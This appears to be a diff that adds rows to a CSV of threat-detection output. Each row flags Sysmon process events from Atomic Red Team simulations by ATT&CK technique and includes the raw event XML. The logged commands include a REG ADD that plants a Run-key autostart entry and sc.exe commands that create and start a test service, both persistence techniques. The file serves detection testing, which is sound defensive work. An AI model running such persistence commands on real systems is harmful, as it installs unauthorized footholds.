+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:44:53.402498Z"">
+    </TimeCreated>
+    <EventRecordID>3599</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:44:53.388</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D765-5D31-0000-001024C32800</Data>
+    <Data Name=""ProcessId"">4264</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547493.349171,2019-07-19T18:44:53.349171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG DELETE &quot; &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic&quot; Red &quot;Team /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:44:53.330492Z"">
+    </TimeCreated>
+    <EventRecordID>3596</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:44:53.314</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D765-5D31-0000-0010D7BD2800</Data>
+    <Data Name=""ProcessId"">5824</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG DELETE &quot; &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic&quot; Red &quot;Team /f&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553037534.182862,2019-03-20T03:18:54.182862+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:18:54.172848Z"">
+    </TimeCreated>
+    <EventRecordID>1966634</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""988"" ThreadID=""1644"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 23:13:38.586</Data>
+    <Data Name=""ProcessGuid"">365ABB72-77A2-5C91-0000-00100A570100</Data>
+    <Data Name=""ProcessId"">1636</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-777F-5C91-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-777F-5C91-0000-00100B590000</Data>
+    <Data Name=""ParentProcessId"">516</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553037534.172848,2019-03-20T03:18:54.172848+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:18:54.172848Z"">
+    </TimeCreated>
+    <EventRecordID>1966633</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""988"" ThreadID=""1644"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 23:13:38.576</Data>
+    <Data Name=""ProcessGuid"">365ABB72-77A2-5C91-0000-00106D560100</Data>
+    <Data Name=""ProcessId"">1628</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-777F-5C91-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-777F-5C91-0000-00100B590000</Data>
+    <Data Name=""ParentProcessId"">516</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547493.258049,2019-07-19T18:44:53.258049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG ADD &quot; &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic&quot; Red &quot;Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:44:53.219598Z"">
+    </TimeCreated>
+    <EventRecordID>3593</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:44:53.201</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D765-5D31-0000-001027B72800</Data>
+    <Data Name=""ProcessId"">6584</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG ADD &quot; &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic&quot; Red &quot;Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547466.222431,2019-07-19T18:44:26.222431+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:44:09.351888Z"">
+    </TimeCreated>
+    <EventRecordID>3588</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:44:09.337</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D739-5D31-0000-0010B2C22600</Data>
+    <Data Name=""ProcessId"">6896</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547449.278042,2019-07-19T18:44:09.278042+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe delete AtomicTestService&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:44:09.253714Z"">
+    </TimeCreated>
+    <EventRecordID>3585</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:44:09.225</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D739-5D31-0000-0010E4BB2600</Data>
+    <Data Name=""ProcessId"">4744</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe delete AtomicTestService&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547449.17604,2019-07-19T18:44:09.176040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe stop AtomicTestService&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:44:09.150760Z"">
+    </TimeCreated>
+    <EventRecordID>3583</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:44:09.142</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D739-5D31-0000-00104CB72600</Data>
+    <Data Name=""ProcessId"">5000</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe stop AtomicTestService&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[  T1543 ] Sc.exe manipulating windows services,1563547448.307214,2019-07-19T18:44:08.307214+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services usign Sc.exe with Command Line (sc.exe  start AtomicTestService) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe start AtomicTestService&quot;) in directory : ( C:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:44:08.288861Z"">
+    </TimeCreated>
+    <EventRecordID>3581</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Persistence or Exec - Services Management</Data>
+    <Data Name=""UtcTime"">2019-07-19 14:44:08.269</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D738-5D31-0000-0010D8AA2600</Data>
+    <Data Name=""ProcessId"">4260</Data>
+    <Data Name=""Image"">C:\Windows\System32\sc.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Service Control Manager Configuration Tool</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">sc.exe  start AtomicTestService</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D738-5D31-0000-001056A62600</Data>
+    <Data Name=""ParentProcessId"">2556</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe start AtomicTestService&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547448.288861,2019-07-19T18:44:08.288861+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe start AtomicTestService&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:44:08.268803Z"">
+    </TimeCreated>
+    <EventRecordID>3580</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:44:08.227</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D738-5D31-0000-001056A62600</Data>
+    <Data Name=""ProcessId"">2556</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe start AtomicTestService&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[  T1543 ] Sc.exe manipulating windows services,1563547448.221461,2019-07-19T18:44:08.221461+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services usign Sc.exe with Command Line (sc.exe  create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe&quot;) in directory : ( C:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
